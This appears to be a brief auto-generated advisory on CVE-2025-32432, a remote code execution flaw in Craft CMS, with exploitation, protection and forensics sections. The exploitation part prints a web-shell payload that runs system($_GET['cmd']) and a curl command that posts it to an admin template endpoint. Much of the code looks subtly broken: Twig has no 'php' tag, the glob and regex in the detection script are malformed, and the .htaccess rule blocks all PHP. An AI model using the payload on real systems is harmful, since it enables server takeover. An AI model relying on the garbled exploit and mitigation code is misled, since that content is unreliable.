Listen to this Post
How the CVE Works
CVE-2025-32432 in Craft CMS allows remote code execution through improper input validation in template rendering. The vulnerability occurs when malicious Twig templates containing crafted PHP code are processed by the CMS. Attackers exploit insecure deserialization during template caching, enabling arbitrary command execution. The flaw exists in Craft’s template compilation logic where user-supplied input isn’t properly sanitized before being written to cache files. When these cached templates are executed, the embedded malicious code runs with web server privileges.
DailyCVE Form
Platform: Craft CMS
Version: 3.0.0-RC1 to 5.6.16
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2025-04-25
What Undercode Say:
Exploitation:
1. Craft malicious Twig template with PHP payload:
{{ {'foo': 'bar'}|json_encode|raw }}
{% php %}system($_GET['cmd']);{% endphp %}
2. Upload via vulnerable endpoint:
curl -X POST "http://target/cms/admin/actions/templates/save" -d "template=malicious.twig&content=<PAYLOAD>"
Protection:
1. Immediate upgrade command:
composer require craftcms/cms:5.6.17
2. .htaccess mitigation:
<FilesMatch "\.(twig|php)$"> Deny from all </FilesMatch>
3. Server-side detection script:
<?php
foreach (glob("templates/.twig") as $file) {
if (preg_match('/{%\sphp\s.?\s%}/is', file_get_contents($file))) {
unlink($file);
}
}
Forensics:
Check log entries with:
grep -r "template.compile" /var/log/craft/
Analytics:
- Attack vector: Template injection
- CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- Exploitability: No auth required
- Patch diff: github.com/craftcms/cms/commit/e1c8544
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
